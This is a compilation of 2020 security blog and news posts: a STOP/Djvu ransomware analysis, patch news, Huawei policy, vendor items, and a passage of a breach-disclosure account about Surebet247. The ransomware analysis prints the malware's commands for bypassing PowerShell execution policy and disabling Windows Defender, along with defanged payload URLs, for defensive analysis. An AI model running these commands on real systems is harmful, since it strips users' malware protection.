In the latter type of encryption, if STOP ransomware is not able to get a response from the CnC, it checks for the existence of bowsakkdestx.txt at ‘%AppData%/Local’ directory. If the file found, it checks for the ‘Public Key’ keyword in the file. If the file does not contain a public key, payload deletes the file and again checks for the CnC response. On the other hand, if the file is not present then it uses public key and ID which are already present in the file. Most of the strings in the payload are present in encrypted form i.e. XORed with byte key 0x80. The recent payloads of stop have an offline ID which is appended by its extension name and “t1”.

ex: Z4aT0c1B4eHWZwaTg43eRzyM1gl3ZaaNVHrecot1

Few file types and directories are skipped from the encryption process based on path and file extensions.

Extensions excluded:

.sys .ini .dll .blf .bat .lnk .regtrans-ms

Along with above extensions, the extension used by payload to indicate encryption is also avoided.

Files Excluded:

ntuser.dat  ntuser.dat.LOG1  ntuser.dat.LOG2  ntuser.pol  _readme.txt

Folders in Windows directory and browser folders in the Program Files directory are excluded from encryption.

Before encryption, it also checks for file encryption marker i.e. “{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}” which is at the end of the file followed by encryption ID.

While encrypting a file, it keeps the first 5 bytes of the file as it is. The rest of the file data is encrypted with the Salsa20 algorithm. For the file data encryption, UUID is created and is used as a key for the Salsa20 algorithm. In this way, each file uses a new UUID and the unique key is used for encryption of each file. Given below is an example of one Salsa20 key.

Fig. 6: Salsa20 Key

After encryption of file data, the UUID used as Salsa20 key is also encrypted with the RSA-2048 public key which was received from the CnC server. In the case of offline encryption, this key is retrieved from the payload itself. The encrypted UUID is appended after encrypted file data. The personal ID which was again received from the server with RSA-2048 public key is appended to encrypted UUID. If files are encrypted offline, then this personal ID is also retrieved from file and is common for all offline infected victims. At the end of the file, encryption marker ‘{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}’ is written.

Fig. 7: File Encryption Structure

 

Lateral Activity:

     1. Vidar (5.exe)

Vidar is a known info-stealer trojan, which collects sensitive information from your system and then delivers it to its CnC. The information it may steal includes:

  • Browser Login Data, History, Cookies
  • Browser Cache
  • System Information
  • Messaging/Email software data
  • Two-factor authentication software data

It checks for the presence of various browsers and software including two-factor authentication tools.

Fig. 8: Vidar File Access

It stores stolen data in a randomly named folder in the ProgramData directory. In this directory, few ‘.zip’ files are created which contain files like information.txt which has details of user and machine, running processes and software installed in the system. The retrieved passwords/credentials from browsers and other software are stored in passwords.txt. The rest of the information is stored in directories/files with respective software names.

Fig. 9: Vidar File Write

There is one file additional named ID which contains data in the form of SQL database having tables like logins, meta, stats, sync_entities_metadata and sync_model_metadata. These tables mainly have browser-related data of the user. All of these data are then sent to CnC of Vidar which is hxxp://crarepo[.]com/ in this case. Changes in the CnC servers are observed over the period.

Fig. 10: Vidar HttpSendRequestA

     2. Updatewin1.exe:

This component is mainly used to hide ransomware’s existence or evade detection based on the behavior of malware. It shows similarity with the Vilsel Trojan family.

First of all, it executes itself with elevated privileges. This process with elevated privileges executes PowerShell with the following command line, to change execution policy from default restricted to RemoteSigned, which results in the execution of local policies without any digital signature.

powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned

Fig. 11: Updatewin RegSetValue

The updatewin1.exe then drops script.ps1 having command ‘Set-MpPreference -DisableRealtimeMonitoring $true’ at %temp% location. A new PowerShell instance is initiated with parameters:

 -NoProfile -ExecutionPolicy Bypass -Command “& {Start-Process PowerShell -ArgumentList ‘-NoProfile -ExecutionPolicy Bypass -File %AppData%\Local\script.ps1″”‘ -Verb RunAs.

This runs PowerShell with admin privileges and bypasses all execution policies for the current instance of PowerShell. This executes script.ps1 resulting in disabling of Windows Realtime Protection. It also removes downloaded updates/signatures of windows defender using the command:

mpcmdrun.exe -removedefinitions -all

The task manager is also disabled by changing the registry and then updatewin1.exe deletes itself using a batch file.

     3. Updatewin.exe:

This component has no suspicious or malicious activity. It just displays windows update prompt so that any of the suspicious activities will be considered as windows update changes. There is no minimize or close option to this window, one has to kill the process to get rid of it.

Fig. 12: Fake Update Window

 

Ransom note:

Fig. 13: _readme.txt Ransom note

Over the campaign, the STOP ransom note has remained the same with few small changes. It asks for $980 of ransom and gives a 50% discount if payment is done within 3 days. The conversation with victims is carried over the mail. Ransom note contains the Personal Id of the user which is also stored in C:\SystemID\PersonalID.txt.

Statistics:

Fig. 14: Statistics

From the introduction of the new RSA 2048 variant, we have seen a noticeable increase in infections. As the chart above states, there was a gradual increase from August till November with hits crossing 120,000 mark. However, there’s been a decrease in hits in December, which seems to have continued in the month of January.

Conclusion:

From the start of the STOP-djvu campaign, stop authors have focused on changing payloads and extensions within short intervals, making their presence among ransomware strong and sound. Initially, authors believed in symmetric cryptography, hoping for ransom from most of the cases with newer payloads and unique keys for each variant. The free decryptors for offline infections forced them to shift to asymmetric cryptography, which made the decryption of new infections harder. Also, propagating through multiple crack software, activators, keygen software and fake software/OS upgrades, has been an effective way of spreading for this ransomware.

IOCs:

Hashes:

74A9A644307645D1D527D7D39A87861C

F64CF802D1E163260F8EBD224E7B2078

959B266CAD13BA35AEE35D8D4B723ED4

9EE3B1BCF67A63354C8AF530C8FA5313

5B4BD24D6240F467BFBC74803C9F15B0

B0A89E143BABDA2762561BC7576017D7

290E97907E5BE8EA72178414762CD846

E3083483121CD288264F8C5624FB2CD1

 URLs:

hxxp://ring2[.]ug/files/penelop/3.exe

hxxp://ring2[.]ug/files/penelop/4.exe

hxxp://ring2[.]ug/files/penelop/5.exe

hxxp://ring2[.]ug/files/penelop/updatewin.exe

hxxp://ring2[.]ug/files/penelop/updatewin1.exe

hxxp://ring2[.]ug/files/penelop/updatewin2.exe

hxxp://crarepo[.]com/

The post STOP (Djvu) Ransomware: Ransom For Your Shady Habits! appeared first on Seqrite Blog.

Microsoft addresses CVE-2020-0601 flaw, the first issue ever reported by NSA

Microsoft has released a security update to address “a broad cryptographic vulnerability” that is impacting its Windows operating system.

Microsoft Patch Tuesday updates for January 2020 address a total of 49 vulnerabilities in various products, including a serious flaw, tracked as CVE-2020-0601, in the core cryptographic component of Windows 10, Server 2016 and 2019 editions.

The CVE-2020-0601 vulnerability is different from any other previously addressed flaws because it was reported by the NSA and this is the first time that the US intelligence agency has reported a bug to the tech giant.

The flaw, dubbed ‘NSACrypt’ and tracked as CVE-2020-0601, resides in the Crypt32.dll module that contains various ‘Certificate and Cryptographic Messaging functions’ used by the Windows Crypto API for data encryption.  

The flaw affects the way Crypt32.dll module validates Elliptic Curve Cryptography (ECC) certificates.

In a press release published by the NSA, the agency explains “the certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution.”

“A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.” reads the security advisory published by Microsoft.

“An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider.”

An attacker could exploit the flaw to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.

An attacker could also trigger the issue to spoof digital signatures on software tricking the system into believing that it is a legitimate application.

Microsoft addressed the issue by ensuring that Windows CryptoAPI completely validates ECC certificates.

Microsoft did not release technical details of the vulnerability to avoid its public exploitation.

Microsoft confirmed that it is not aware of attacks in the wild exploiting the CVE-2020-0601 flaw.

“This month we addressed the vulnerability CVE-2020-0601 in the usermode cryptographic library, CRYPT32.DLL, that affects Windows 10 systems. This vulnerability is classed Important and we have not seen it used in active attacks.” reads a blog post published by Microsoft.

“This vulnerability is one example of our partnership with the security research community where a vulnerability was privately disclosed and an update released to ensure customers were not put at risk.”

The NSA has also released a security advisory that includes mitigation information.

“NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows®1 cryptographic functionality. The certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution.” reads the NSA’s advisory.

“The consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available”.

Microsoft also addresses 48 other vulnerabilities, 8 of which are rated as critical and remaining are rated as important.

None of the issues addressed this month by Microsoft were being exploited in the wild.

Pierluigi Paganini

(SecurityAffairs – CVE-2020-0601, hacking)

The post Microsoft addresses CVE-2020-0601 flaw, the first issue ever reported by NSA appeared first on Security Affairs.

January 2020 Adobe Patch Tuesday updates fix issues in Illustrator, Experience Manager

Adobe released its January 2020 Patch Tuesday updates that address several flaws in Illustrator and Experience Manager products.

Adobe releases its first 2020 patch Tuesday software updates that address several vulnerabilities in Illustrator and Experience Manager products.

“Adobe has published security bulletins for Adobe Experience Manager (APSB20-01) and Adobe Illustrator (APSB20-03). Adobe recommends users update their product installations to the latest versions using the instructions referenced in the bulletin.” reads the security advisory.

The security updates for Illustrator CC 2019 for Windows addresses five critical memory corruption issues (CVE-2020-3710, CVE-2020-3711, CVE-2020-3712, CVE-2020-3713, CVE-2020-3714) that can lead to arbitrary code execution in the context of the targeted user.

All the vulnerabilities were reported to Adobe by Honggang Ren of Fortinet’s FortiGuard Labs.

While the vulnerabilities have been assigned a severity rating of critical, their priority rating is 3, which means Adobe does not expect any of them to be exploited in attacks.

Adobe also releases security updates for Adobe Experience Manager (AEM) that addresses four issues rated as important and moderate (CVE-2019-16466, CVE-2019-16467, CVE-2019-16468, CVE-2019-16469).

The flaws rated important are Reflected Cross-Site Scripting cross-site scripting (XSS) or Expression Language injection and could lead to the disclosure of sensitive information. The security hole rated moderate has been described as a user interface injection issue and it can also lead to the disclosure of sensitive information.

The flaws tracked as CVE-2019-16466 and CVE-2019-16468 were reported to Adobe by the security expert Lorenzo Pirondini of Netcentric.

Pierluigi Paganini

(SecurityAffairs – Adobe Patch Tuesday, hacking)

The post January 2020 Adobe Patch Tuesday updates fix issues in Illustrator, Experience Manager appeared first on Security Affairs.

Cisco addressed a high-severity bug in Webex that could allow Remote Code Execution

Tech giant Cisco has recently addressed two high-severity vulnerabilities affecting its Webex and IOS XE Software products.

Cisco Systems has released security fixes for two high-severity vulnerabilities in its products, including a remote code execution flaw in the Webex video conferencing platform.

The Webex flaw resides in the web-based management interface of Cisco Webex Video Mesh, a feature that enables on-premises infrastructure for video conferencing.

“A vulnerability in the web-based management interface of Cisco Webex Video Mesh could allow an authenticated, remote attacker to execute arbitrary commands on the affected system.” reads the security advisory published by Cisco.

“The vulnerability is due to improper validation of user-supplied input by the web-based management interface of the affected software. An attacker could exploit this vulnerability by logging in to the web-based management interface with administrative privileges and supplying crafted requests to the application. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux operating system with root privileges on a targeted node.”

An authenticated, remote attacker could exploit the issue by supplying crafted requests to the application.

This flaw affects Cisco Webex Video Mesh Software releases earlier than 2019.09.19.1956m.

The vulnerability has received a CVSS score of 7.2 out of 10, the good news is that Cisco said that it is not aware of any attacks exploiting the flaw in the wild.

Cisco also addressed a high-severity flaw in the web user interface of Cisco IOS and Cisco IOS XE Software that runs on Cisco routers and switches.

“A vulnerability in the web UI of Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system.” reads the Cisco security advisory.

“The vulnerability is due to insufficient CSRF protections for the web UI on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the targeted user. If the user has administrative privileges, the attacker could alter the configuration, execute commands, or reload an affected device.”

The vulnerability could be exploited by an unauthenticated, remote attacker to launch a cross-site request forgery (CSRF) attack on the vulnerable devices. An attacker could exploit the issue by tricking the victims into clicking specially-crafted links that then send a forged request to the webserver running on the device.

The attacker could exploit the vulnerability to perform arbitrary actions with the privilege level of the targeted user.

The issue affects Cisco devices that are running vulnerable releases of Cisco IOS or Cisco IOS XE Software earlier than 16.1.1 with the HTTP Server feature enabled.

The flaw was reported by Mehmet Önder Key and received a CVSS score of 8.8, Cisco is not aware of any exploits in the wild against the issue.

Pierluigi Paganini

(SecurityAffairs – Cisco WebEx, hacking)

The post Cisco addressed a high-severity bug in Webex that could allow Remote Code Execution appeared first on Security Affairs.

US officials meet UK peers to remark the urgency to ban Huawei 5G tech

U.S. officials responsible for national security and telecommunications were meeting their peers in Britain ahead of the final decision on Huawei 5G technology.

U.S. officials responsible for national security and telecommunications were meeting their peers in Britain in the attempt to convince U.K. Prime Minister Boris Johnson’s government to ban Huawei 5G technology from its networks.

“The security and resilience of the U.K.’s telecoms network is of paramount importance,” spokesman Slack James Slack told reporters. “We have strict controls for how Huawei equipment is currently deployed in the U.K. The government is undertaking a comprehensive review to ensure the security and resilience of 5G and fiber in the U.K.”

Slack confirmed that the government is still investigating the security of the 5G network.

Senator Tom Cotton (R-Arkansas) has introduced last week a new bill that would ban the sharing of intelligence with countries that use Huawei equipment on their fifth-generation (5G) networks.

Since November 2018, the US Government has invited its allies to exclude Chinese equipment from critical infrastructure and 5G architectures over security concerns.

The United States always highlighted the risks to national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.

Chinese equipment is broadly adopted in many allied countries, including Germany, Italy, and Japan.

Many countries are going to build 5G infrastructure, but the approach of their governments is completely different.

Huawei

The U.S. has banned the use of Huawei products in federal agencies and In November Federal Communications Commission voted to cut off funds for Chinese telecom equipment from Huawei and ZTE. The US regulators consider the Chinese equipment in US telecommunications networks a threat to homeland security.

According to U.K. security minister Brandon Lewis, the British government would make the final decision on the adoption of Huawei technology for its 5G networks “relatively soon.”

Pierluigi Paganini

(SecurityAffairs – Bronze President, hacking)

The post US officials meet UK peers to remark the urgency to ban Huawei 5G tech appeared first on Security Affairs.

Tour the RSA Conference 2020 Security Operations Center

Register now for your free tour of the RSA Conference Security Operations Center (SOC), where engineers are monitoring all traffic on the Moscone Wireless Network for security threats. The SOC is sponsored by RSA and Cisco. Sign up for a guided tour, where we’ll show real time traffic in NetWitness Packets, plus advanced malware analysis, sandboxing and threat intelligence from Cisco Threat Grid, Threat Response and Umbrella, and protection from Cisco Next-Gen Firewall.

At the SOC, you will receive a security briefing and have time for Q&A with RSA and Cisco engineers.

Advanced registration is highly recommended. Below are the available tour times. Please fill out the RSA SOC Tour Request Form to request your spot.

SOC Tours Offered Tues-Thurs (25-27 February 2020):

  • 10:30
  • 11:30
  • 1:00
  • 2:00
  • 3:00 (not on Thursday)

Please meet at the Cisco Threat Wall, which is located at the base of the escalator in the North Hall, where a Cisco team member will escort the group to the SOC (max. 25 persons per tour).

Also, plan to attend the official out briefing on the observations for RSAC 2020:

Abstract:  In this session we share our experience monitoring the RSAC network for stability, security, and stats of interest. We’ll talk about what changes we’ve seen over the years, informative and comical experiences from the trenches, and what we think it means for our industry going forward. So, if you’d like to see what a network looks like when its users know security, know its challenges, should know better, and choose to ignore all of that anyway; join us for the RSAC SOC report.

You may also be interested in reading The 1st Annual RSAC SOC Report.

The post Tour the RSA Conference 2020 Security Operations Center appeared first on Cisco Blogs.

Datacenter Security: How to Balance Business Agility with Great Protection

When IDC consults with enterprise customers or performs worldwide surveys, security is invariably an acute concern. That’s regardless of geography, industry, and identity of respondent (executive, LoB, IT, DevOps, etc.). While the challenge of providing protection and security extends across all places in the network, the problem is especially vexing in the datacenter.

There’s good reason for that, of course. The parameters of the datacenter have been redrawn by the unrelenting imperative of digital transformation and the embrace of multicloud, which together have had substantive implications for workload protection and data security.

As workloads become distributed – residing in on-premises enterprise datacenters, in co-location facilities, in public clouds, and also in edge environments – networking and network-security challenges proliferate and become more distributed in nature. Not only are these workloads distributed, but they’re increasingly dynamic and portable, subject to migration and movement between on-premises datacenters and public clouds.

Data proliferates in lockstep with these increasingly distributed workloads. This data can inform and enhance the digital experiences and productivity of employees, contractors, business partners, and customers, all of whom regularly interact with applications residing across a distributed environment of datacenters. The value of datacenters is ever greater, but so are the risks of data breaches and thefts, perpetrated by malevolent parties that are increasingly sophisticated.

In that cloud is not only a destination but also an operating model, the rise of cloud-native applications and DevOps practices have added further complications. As DevOps teams adopt continuous integration and continuous deployment (CI/CD) to keep up with the need for business speed and as developers leverage containers and microservices for agility and simplicity, traditional security paradigms – predicated on sometimes rigid controls and restrictions – are under unprecedented pressure. For enterprises, the choice seems to be between the agility of cloud and cloud-native application environments on one side and the control and safety of traditional datacenter-security practices on the other.

Perhaps that isn’t true, though. There is a way to move forward that gives organizations both agility and effective security controls, without compromise on either front. Put another way, there needn’t a permanent unresolved tension between the need for business agility and the require for strong security, capable of providing the controls that organizations want while aligning more closely with business outcomes.

The first step toward this goal involves achieving visibility. If you can’t see threats, you can’t protect against them. This visibility must be both pervasive and real-time, capable of sensing and facilitating responses to anomalies and threats that span users, devices, applications, workloads, and processes (workflow). From a network standpoint, visibility must be available within datacenters – into north-south and east-west traffic flows –between them, and out to campus and branch sites as well as to clouds. The visibility should extend up the stack, too, all the way to application components and behavior, giving organizations views into potentially malicious activity such as data exfiltration and the horizontal spread of malware from server to server.

Once visibility is achieved, organizations can leverage the insights it provides to implement policy-based segmentation comprehensively and effectively, mitigating lateral propagation of attacks within and between datacenters and preventing bad actors from gaining access to high-value datacenter assets.

The foundations of visibility and policy-based segmentation, in turn, facilitate a holistic approach to threat protection, helping to establish an extensive network of capabilities and defenses that can quickly detect and respond to threats and vulnerabilities before they result in data loss or prohibitively costly business disruptions.

While it might seem that cloud-era business agility and effective security are irreconcilable interests, there is a path forward that merges the two in unqualified alignment.

For more information, see the Cisco-IDC webinar.

 

The post Datacenter Security: How to Balance Business Agility with Great Protection appeared first on Cisco Blogs.

This Week in Security News: INTERPOL Collaboration Reduces Cryptojacking by 78% and Three Malicious Apps Found on Google Play May be Linked to SideWinder APT Group

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how Trend Micro’s collaboration with INTERPOL’s Global Complex for Innovation helped reduce cryptojacking by 78% in Southeast Asia. Also, read about three malicious apps in the Google Play Store that may be linked to the SideWinder threat group.

Read on:

First Active Attack Exploiting CVE-2019-2215 Found on Google Play, Linked to SideWinder APT Group

Trend Micro found three malicious apps in the Google Play Store that work together to compromise a device and collect user information. The three malicious apps — disguised as photography and file manager tools — are likely to be connected to SideWinder, a known threat group that has reportedly targeted military entities’ Windows machines.

Operation Goldfish Alpha Reduces Cryptojacking Across Southeast Asia by 78%

Interpol announced the results of Operation Goldfish Alpha, a six-month effort to secure hacked routers across the Southeast Asia region. The international law enforcement agency said its efforts resulted in a drop of cryptojacking operations across Southeast Asia by 78%, compared to levels recorded in June 2019. Private sector partners included the Cyber Defense Institute and Trend Micro.

Celebrating Decades of Success with Microsoft at the Security 20/20 Awards

Trend Micro, having worked closely with Microsoft for decades, is honored to be nominated for the Microsoft Security 20/20 Partner awards in the Customer Impact and Industry Changemaker categories. Check out this blog for more information on the inaugural awards and Trend Micro’s recognitions.

Security Predictions for 2020 According to Trend Micro

Threat actors are shifting and adapting in their choice of attack vectors and tactics — prompting the need for businesses and users to stay ahead of the curve. Trend Micro has identified four key themes that will define 2020: a future that is set to be Complex, Exposed, Misconfigured and Defensible. Check out Digital Journal’s Q&A with Greg Young, vice president of cybersecurity at Trend Micro, to learn more about security expectations for this year.

The Everyday Cyber Threat Landscape: Trends from 2019 to 2020

In addition to security predictions for the new year, Trend Micro has listed some of the biggest threats from 2019 as well as some trends to keep an eye on as we begin 2020 in this blog. Many of the most dangerous attacks will look a lot like the ones Trend Micro warned about in 2019.

5 Key Security Lessons from the Cloud Hopper Mega Hack

In December 2019, the U.S. government issued indictments against two Chinese hackers who were allegedly involved in a multi-year effort to penetrate the systems of companies managing data and applications for customers via the computing cloud. The men, who remain at large, are thought to be part of a Chinese hacking collective known as APT10.

The Summit of Cybersecurity Sits Among the Clouds

Shifts in threats in the security landscape have led Trend Micro to develop Trend Micro Apex One™, a newly redesigned endpoint protection solution. Trend Micro Apex One™ brings enhanced fileless attack detection and advanced behavioral analysis and combines Trend Micro’s powerful endpoint threat detection capabilities with endpoint detection and response (EDR) investigative capabilities.

New Iranian Data Wiper Malware Hits Bapco, Bahrain’s National Oil Company

Iranian state-sponsored hackers have deployed a new strain of data-wiping malware on the network of Bapco, Bahrain’s national oil company. The incident took place on December 29th and didn’t have the long-lasting effect hackers might have wanted, as only a portion of Bapco’s computer fleet was impacted and the company continued to operate after the malware’s detonation. 

Ransomware Recap: Clop, DeathRansom, and Maze Ransomware

As the new year rolls in, new developments in different ransomware strains have emerged. For example, Clop ransomware has evolved to integrate a process killer that targets Windows 10 apps and various applications; DeathRansom can now encrypt files; and Maze ransomware has been targeting U.S. companies for stealing and encrypting data, alerted by the Federal Bureau of Investigation (FBI).

4 Ring Employees Fired for Spying on Customers

Smart doorbell company Ring said that it has fired four employees over the past four years for inappropriately accessing customer video footage. The disclosure comes in a recent letter to senators from Amazon-owned Ring as it attempts to defend the privacy of its platform, which has been plagued by data privacy incidents over the past year.

Web Skimming Attack on Blue Bear Affects School Admin Software Users

A web skimming attack was recently used to target Blue Bear, a school administration software that handles school accounting, student fees, and online stores for educational institutions. Names, credit card or debit card numbers, expiration dates and security codes, and Blue Bear account usernames and passwords may have been collected.

Patched Microsoft Access ‘MDB Leaker’ (CVE-2019-1463) Exposes Sensitive Data in Database Files

Researchers uncovered an information disclosure vulnerability (CVE-2019-1463) affecting Microsoft Access, which occurs when the software fails to properly handle objects in memory. The vulnerability, dubbed “MDB Leaker” by Mimecast Research Labs, resembles a patched information disclosure bug in Microsoft Office (CVE-2019-0560) found in January 2019.

Cryptocurrency Miner Uses Hacking Tool Haiduc and App Hider Xhide to Brute Force Machines and Servers

A Trend Micro honeypot detected a cryptocurrency-mining threat on a compromised site, where the URL hxxps://upajmeter[.]com/assets/.style/min was used to host the command for downloading the main shell script. The miner, a multi-component threat, propagates by scanning vulnerable machines and brute-forcing (primarily default) credentials.

What are your thoughts on the rise of cryptomining malware and cryptojacking tactics? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: INTERPOL Collaboration Reduces Cryptojacking by 78% and Three Malicious Apps Found on Google Play May be Linked to SideWinder APT Group appeared first on .

INTERPOL Collaboration Reduces Cryptojacking by 78%

Cybercriminals are often seen as having the upper hand over the “white hat” community. After all, they’re anonymous, can launch attacks from virtually anywhere in the world, and usually have the element of surprise. But there’s one secret weapon the good guys have: Collaboration. That’s why Trend Micro has always prioritized its partnerships with law enforcement, academia, governments and other cybersecurity businesses.

We’re proud to have contributed to yet another successful collaborative operation with INTERPOL Global Complex for Innovation (IGCI) in Singapore that’s helped to reduce the number of users infected by cryptomining malware by 78%.

Cryptomining On The Rise

Also known as cryptojacking, these attacks have become an increasingly popular way for cybercriminals to make money.

Why?

Because victims don’t know they’ve been infected. The malware sits on their machine in the background mining for digital currency 24/7/365. Increasingly, hackers have taken to launching sophisticated attacks against enterprise IT systems and cloud servers to increase their mining and earning potential. But many still target home computer systems like routers, as these are often left relatively unprotected. Stitch enough of these devices together in a botnet and they have a ready-made cash cow.

That’s why cryptojacking remained the most detected threat in the first half of 2019 in terms of file-based threat components, according to our data.

Unlike serious data breaches, phishing attacks, ransomware and banking Trojans, cryptojacking doesn’t have major impact on the victim. They don’t lose sensitive personal data, there’s no risk of follow-on identity fraud and they’re not extorted for funds by being locked out of their PC.

However, it’s not without consequences: Cryptomining malware can slow your home network to a crawl while running up serious energy bills. It may even bring your home computers to a premature end. Also, there’s always the risk with any kind of malware infection that hackers may switch tactics and use their footprint on your home machines to launch other attacks in the future.

Enter Operation Goldfish Alpha

That’s why we were keen to offer our assistance to INTERPOL during this year’s Operation Goldfish Alpha. Thanks to our broad global visibility into attack trends and infection rates, we were able to articulate the scale of the cryptojacking threat and key mitigation steps, at a pre-operation meeting with ASEAN law enforcement officers in June.

A few months later, we developed and disseminated a key Cryptojacking Mitigation and Prevention guidance document. It details how a vulnerability in MikroTik routers had exposed countless users in the region to the risk of compromise by cryptomining malware. The document explains how to scan for this flaw using Trend Micro HouseCall for Home Networks, and how HouseCall can be used to detect and delete the Coinhive JavaScript that hackers were using to mine for digital currency on infected PCs.

Spectacular Success

Over the five months of Operation Goldfish Alpha, experts from national Computer Emergency Response Teams (CERTs) and police across 10 countries in the region worked to locate the infected routers, notify the victims and use our guidance document to patch the bugs and kick out the hackers.

Having helped to identify over 20,000 routers in the region that were hacked in this way, we’re delighted to say that by November, the number had reduced by at least 78%.

That’s the value of partnerships between law enforcement and private cybersecurity companies: They combine the power of investigative policing with the detailed subject matter expertise, visibility and resources of industry experts like us. We’ll continue to lend a hand wherever we can to make our connected, digital world a safer place.

The post INTERPOL Collaboration Reduces Cryptojacking by 78% appeared first on .

The Difficulty of Disclosure, Surebet247 and the Streisand Effect

The Difficulty of Disclosure, Surebet247 and the Streisand Effect

This is a blog post about disclosure, specifically the difficulty with doing it in a responsible fashion as the reporter whilst also ensuring the impacted organisation behaves responsibly themselves. It's not a discussion we should be having in 2020, a time of unprecedented regulatory provisions designed to prevent precisely the sort of behaviour I'm going to describe in this post. Here you're going to see - blow by blow - just how hard it is for those of us with the best of intentions to deal with organisations who have a very different set of priorities. This is a post about how hard disclosure remains and how Surebet247's behaviour now has them experiencing the full blown Streisand effect.

It began with this email:

The Difficulty of Disclosure, Surebet247 and the Streisand Effect

I get these every single day. Seriously, the flood of data that reaches my inbox is hard to describe it's that incessant. It's not always legit, mind you, and I invest a great deal of effort in establishing the authenticity of an alleged breach before loading it into Have I Been Pwned (HIBP). I've written before about how I verify breaches and it didn't take long to be pretty confident that per the subject line of the email above, Surebet247 (a Nigerian gambling website) had suffered a data breach. I'm going to save how I established that for a little later as it'll form part of the subsequent messages I sent them, the main thing for now is that as soon as I was sufficiently confident of the data's authenticity I fired off an email to their published support address:

The Difficulty of Disclosure, Surebet247 and the Streisand Effect

The message was received. It must have been because the following response immediately came back:

The Difficulty of Disclosure, Surebet247 and the Streisand Effect

I don't know how much of Office 365 sending the email directly to junk can be attributed to its automated nature, how much is related to its country of origin and how much is due to a missing DMARC record. But that's not the point - the email was received and then... crickets. A couple of days later and without response, I sought the support of Tefo Mohapi, a journalist in South Africa I worked with on the massive Master Deeds breach in 2017. I often use journalists I trust like Tefo to get in touch with unresponsive companies as they're very good at making them sit up and pay attention. And that's where things started to get weird.

With his permission, I'm sharing some of the communication Tefo subsequently had with the company because it's an important part of the narrative as it relates to disclosure. He managed to get a response via Twitter DM pretty promptly, albeit one that didn't really inspire much confidence they were taking this seriously:

The Difficulty of Disclosure, Surebet247 and the Streisand Effect

One thing you'll notice in Tefo's first message is the screen grab showing multiple difference database backups (and a single .sql file) indicating they came from different services (my original disclosure email also mentions this). You see, whilst the message that came to me only indicated Surebet247, the ZIP file I was sent included a total of 6 different databases from different services. You'll see those referenced again a little later on but the main thing for now is that regardless of the origin of the breach(es) or whose actual system suffered it, there was very likely data involved that customers had provided directly to Surebet247. They are the organisation people entrusted with their personal information and they are accountable for what happens to it after that.

Also experiencing nothing but crickets, a couple of days later Tefo follows up with Surebet247 to ask them how they're progressing:

The Difficulty of Disclosure, Surebet247 and the Streisand Effect

"That is ours to decide." Seriously? That's how you're going to handle this breach? It was becoming apparent that Surebet247 was not intending to set an exemplary example of breach response. Now many days in and having exhausted all reasonable avenues to drive Surebet247 towards appropriate handling of the incident, Tefo wrote about how Nigeria's SureBet247 has suffered a potential security breach. He wrote about our attempts alert them to the incident, the contents of the breach and about their "nonchalant attitude". He also wrote about the other betting operators implicated in the database backups and how there appeared to be a common thread across them. Suddenly, he had their attention. And they weren't happy.

I'll refrain from posting the entire messages he received as they were a bit, well, "legal", but they came from a combination of Surebet247's founder, Sheriff Olaniyan, and a south African attorney they'd retained. The former stated that they "seriously frown at this malicious news been [sic] promoted by your organization" and that they "will not hesitate to take legal action if you don't stop and bring this down". It continued with "No customer data of ours was hacked or exposed" and that Tefo's story amounted to "fake news" (yes, seriously, they went Trump on him). Now, keep in mind that at this stage nobody from Surebet247 had replied to me and subsequently, nobody had seen the data I'd been sent. Yet somehow - magically - they had determined they were in the clear.

Changing pace for just a moment, I want to throw Surebet247 a bone (it's the only one they'll get) because it does look like they had reason for some initial suspicion. Within Sheriff's message to Tefo he also said that "your informant was asking for payment and this was demanded from us". In subsequent discussions, Tefo and I concluded that this was very likely correct: someone in possession of the data was shaking them down for cash. Clearly this is not only unethical but also outright illegal and it would help explain Surebet247's apprehension when approached by other parties about the incident. But that's where the bone-throwing ends as clearly both Tefo's and my own intentions were entirely ethical and it would take about 3 minutes of Googling to work out who we both were and where our moral compasses on such issues point. I understand them being skittish, but shooting the messenger doesn't make for good incident response.

Around the same time as the founder's threatening message, Surebet247 elected to go full Iraqi Information Minister on the situation:

There were many very appropriate responses posted to that tweet (there's huge comedic value in that firewall comment), but I feel this one provides the best summary of their position:

Once again, keep in mind that as yet, Surebet247 had yet to reply to a single message I'd sent them and did not have the data I'd received, certainly not directly from me and I've seen no evidence to date they'd received it from anyone else either. Assuming they based that tweet on Tefo's story, there was absolutely no basis for them to make that statement.

Becoming increasingly frustrated, I tweeted but refrained from naming them specifically whilst I considered how to proceed:

My gut reaction was that if they wanted to take this discussion onto the public timeline then a series of rebuttal tweets would be appropriate. I drafted them, sat on them for a while then decided against it. I don't want to see this sort of thing play out on the public timeline, not unless other reasonable approaches have been exhausted so I took the drafts and 14 hours after their denial tweet, DM'd them instead:

The Difficulty of Disclosure, Surebet247 and the Streisand Effect

There were 4 subsequent images in the DM thread, the first of which was of the original email to their support address. The second 2 demonstrated the enumeration vector on their password reset feature which confirmed emails in the alleged breach presently exist in their system. Conversely, fabricated emails which wouldn't exist on their system produced an error message. Here are those 2 images:

The Difficulty of Disclosure, Surebet247 and the Streisand Effect
The Difficulty of Disclosure, Surebet247 and the Streisand Effect

That alone gives me a huge degree of confidence in the legitimacy of the breach (I tested a handful of addresses and they consistently produced the same results), but hey, why stop there? I sent a 4th image showing the registration feature confirming that usernames in the breach exist in the online system:

